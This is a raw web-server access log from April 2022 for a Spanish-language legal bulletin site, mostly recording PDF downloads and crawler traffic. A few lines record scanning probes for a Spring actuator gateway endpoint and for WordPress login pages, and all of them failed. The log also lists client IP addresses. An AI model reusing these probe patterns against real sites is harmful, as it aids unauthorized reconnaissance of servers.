172.22.2.4 - - [16/Apr/2022:18:24:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
186.29.81.144 - - [16/Apr/2022:18:27:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 873900
195.154.172.143 - - [16/Apr/2022:18:27:39 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
186.29.81.144 - - [16/Apr/2022:18:27:53 -0500] "GET /BLA/resoluciones/AUTOS%202014/5237.pdf HTTP/1.1" 200 499346
216.245.221.92 - - [16/Apr/2022:18:28:18 -0500] "HEAD / HTTP/1.1" 200 -
181.53.13.95 - - [16/Apr/2022:18:31:20 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:18:29:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.199 - - [16/Apr/2022:18:32:19 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2012%2F HTTP/1.1" 200 140066
172.22.2.4 - - [16/Apr/2022:18:32:24 -0500] "GET /BLA/boletinlegal/actuator/gateway/routes HTTP/1.1" 404 1018
172.22.2.4 - - [16/Apr/2022:18:30:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
207.46.13.115 - - [16/Apr/2022:18:33:15 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342653
216.245.221.92 - - [16/Apr/2022:18:33:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Apr/2022:18:32:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45629
201.245.192.253 - - [16/Apr/2022:18:33:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45482
66.249.65.17 - - [16/Apr/2022:18:34:31 -0500] "-" 408 -
172.245.186.189 - - [16/Apr/2022:18:34:55 -0500] "GET / HTTP/1.1" 400 946
186.29.81.144 - - [16/Apr/2022:18:36:44 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13093
186.29.81.144 - - [16/Apr/2022:18:36:48 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 405472
186.29.81.144 - - [16/Apr/2022:18:37:01 -0500] "GET /BLA/resoluciones/AUTOS%202013/0717.pdf HTTP/1.1" 200 816531
172.22.2.4 - - [16/Apr/2022:18:35:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:18:35:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48513
172.22.2.4 - - [16/Apr/2022:18:36:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
216.245.221.92 - - [16/Apr/2022:18:38:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:18:39:33 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [16/Apr/2022:18:39:35 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 200 320793
172.22.2.4 - - [16/Apr/2022:18:39:39 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
172.22.2.4 - - [16/Apr/2022:18:39:43 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000006%20DEL%2005%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 249615
172.22.2.4 - - [16/Apr/2022:18:39:49 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
172.22.2.4 - - [16/Apr/2022:18:39:55 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 200 422655
172.22.2.4 - - [16/Apr/2022:18:40:01 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 200 307959
172.22.2.4 - - [16/Apr/2022:18:40:07 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000014%20del%2001%20de%20septiembre%20del%202020.pdf HTTP/1.1" 200 320826
172.22.2.4 - - [16/Apr/2022:18:40:13 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%2012%20del%2014%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 344384
172.22.2.4 - - [16/Apr/2022:18:40:19 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%20006%20del%2008%20de%20Febrero%20de%202019.pdf HTTP/1.1" 200 674401
172.22.2.4 - - [16/Apr/2022:18:40:25 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
172.22.2.4 - - [16/Apr/2022:18:40:30 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 159877
172.22.2.4 - - [16/Apr/2022:18:40:35 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200003%20del%2031%20de%20Enero%20de%202019.pdf HTTP/1.1" 200 164676
172.22.2.4 - - [16/Apr/2022:18:40:39 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000020%20del%2020%20de%20diciembre%20de%202019.pdf HTTP/1.1" 200 145170
172.22.2.4 - - [16/Apr/2022:18:40:44 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 158030
172.22.2.4 - - [16/Apr/2022:18:40:49 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [16/Apr/2022:18:40:52 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2011%20del%2024%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 169541
172.22.2.4 - - [16/Apr/2022:18:40:57 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 163426
172.22.2.4 - - [16/Apr/2022:18:41:02 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%200015%20del%207%20de%20Diciembre%20de%202018.pdf HTTP/1.1" 200 165305
172.22.2.4 - - [16/Apr/2022:18:41:07 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 200 515008
172.22.2.4 - - [16/Apr/2022:18:41:15 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%202%20del%201%20de%20Septiembre%20de%202017.pdf HTTP/1.1" 200 152575
172.22.2.4 - - [16/Apr/2022:18:41:20 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%201%20del%2030%20de%20Marzo%20de%202017.pdf HTTP/1.1" 200 668532
172.22.2.4 - - [16/Apr/2022:18:41:27 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%2007%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 309906
172.22.2.4 - - [16/Apr/2022:18:41:35 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
172.22.2.4 - - [16/Apr/2022:18:41:40 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 200 752890
172.22.2.4 - - [16/Apr/2022:18:41:45 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 200 660637
172.22.2.4 - - [16/Apr/2022:18:41:53 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%203%20del%2014%20de%20Noviembre%20de%202014.pdf HTTP/1.1" 200 104132
172.22.2.4 - - [16/Apr/2022:18:41:58 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%202%20del%2021%20de%20septiembre%20de%202014.pdf HTTP/1.1" 200 143376
172.22.2.4 - - [16/Apr/2022:18:42:02 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%201%20del%2008%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 180124
172.22.2.4 - - [16/Apr/2022:18:42:07 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%208%20del%201%20de%20Noviembre%20de%202013.pdf HTTP/1.1" 200 385156
172.22.2.4 - - [16/Apr/2022:18:42:08 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Apr/2022:18:42:15 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 200 340934
172.22.2.4 - - [16/Apr/2022:18:42:25 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 200 4210437
1.116.195.130 - - [16/Apr/2022:18:42:37 -0500] "HEAD / HTTP/1.1" 200 -
1.116.195.130 - - [16/Apr/2022:18:42:38 -0500] "GET /wp-login.php HTTP/1.1" 404 1241
1.116.195.130 - - [16/Apr/2022:18:42:38 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 404 1241
1.116.195.130 - - [16/Apr/2022:18:42:39 -0500] "GET /blog/wp-login.php HTTP/1.1" 404 1241
1.116.195.130 - - [16/Apr/2022:18:42:40 -0500] "GET /wp/wp-login.php HTTP/1.1" 404 1241
172.22.2.4 - - [16/Apr/2022:18:42:43 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
172.22.2.4 - - [16/Apr/2022:18:42:48 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%204%20del%2005%20de%20junio%20de%202013.pdf HTTP/1.1" 200 130461
172.22.2.4 - - [16/Apr/2022:18:42:53 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%203%20del%2005%20de%20abril%20de%202013.pdf HTTP/1.1" 200 93580
172.22.2.4 - - [16/Apr/2022:18:42:57 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%202%20del%2022%20de%20enero%20de%202013.pdf HTTP/1.1" 200 85466
172.22.2.4 - - [16/Apr/2022:18:43:01 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%201%20del%2014%20de%20enero%20de%202013.pdf HTTP/1.1" 200 1298384
172.22.2.4 - - [16/Apr/2022:18:43:05 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
